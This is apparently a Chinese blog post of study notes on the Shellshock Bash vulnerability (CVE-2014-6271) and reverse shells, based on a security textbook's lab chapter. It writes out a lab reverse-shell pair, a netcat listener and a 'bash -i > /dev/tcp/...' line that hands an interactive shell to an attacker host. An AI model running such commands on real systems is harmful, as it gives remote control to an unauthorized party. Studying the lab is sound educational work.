Shellshock_Attack

Shellshock漏洞与反弹Shell
本文回顾了Shellshock(CVE-2014-6271)漏洞的分析与复现过程,深入探讨了Bash远程代码执行机制,并介绍了如何利用反弹Shell进行攻击。同时,文章涵盖了CGI的基础概念及其在漏洞利用中的作用。

来源:《Computer Security》A Hands-on Approach — Wenliang Du

Chapter03 Shellshock Attack

书上的内容是很好的。这里仅仅做个学习笔记。

这是实打实的一个以前的漏洞。能复现这个漏洞,感觉还不错。

这个漏洞修复了,便没有。所以,这一章节Shellshock Attack 不是重点。reverse shell 是重点。

还有便是要补充PHP与数据库。

比较尴尬的是,虽然复现了bash的漏洞;单独使用了反弹shell;但是CGI+bash4.1+reverse shell 并没有得到复现。

这一章的思路:bash的漏洞介绍 + 符合利用漏洞的CGI + 使用reverse shell


漏洞“破壳”(CVE-2014-6271)分析

网上的文章,已经写的相当清楚了。

Bash远程代码执行漏洞“破壳”(CVE-2014-6271)分析

上面文章的条理性很好。

漏洞的编号+发布的时间+受影响的平台及版本+影响范围+漏洞原理+漏洞验证方法+漏洞的影响+漏洞的修复。

现在如果想复现这个实验,可以参考:详解ShellShock 漏洞复现原理,内附ShellShock的修复方法



CGI 介绍

略。我不懂。可以参考:万法归宗——CGIcgi原理



shell 反弹

参考:shell 反弹总结

想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。

那么什么情况下正向连接不太好用了呢?
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变,你不能持续控制。
2.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
3.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。

反弹就很好理解了, 攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

我目前晓得是上面使用的皮毛。

文件描述符与重定向,可以参考:Linux 标准文件描述符

#attack machine :10.0.2.6
#监听8080端口(可以换个端口,这个端口比较常见)
nc -lvvp 8080
#victim machine :10.0.2.5
# i参数,表示interactiva
# 输出重定向到/dev/tcp/10.0.2.6/8080
# 输入重定向到,输出重定向的设备
# 错误输出重定向到,输出重定向的设备
bash -i > /dev/tcp/10.0.2.6/8080 0<&1 2>&1

在这里插入图片描述在这里插入图片描述

参考文章

–漏洞参考:

Bash远程代码执行漏洞“破壳”(CVE-2014-6271)分析

详解ShellShock 漏洞复现原理,内附ShellShock的修复方法

–CGI参考:(没咋看懂)

万法归宗——CGI

cgi原理

–反弹shell:

【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。

–其他

在腾讯云 Ubuntu18.04 安装配置 MySQL 5.7(踩坑警告⚠️)

Linux 标准文件描述符

CVE-2014-6271

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

da1234cao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值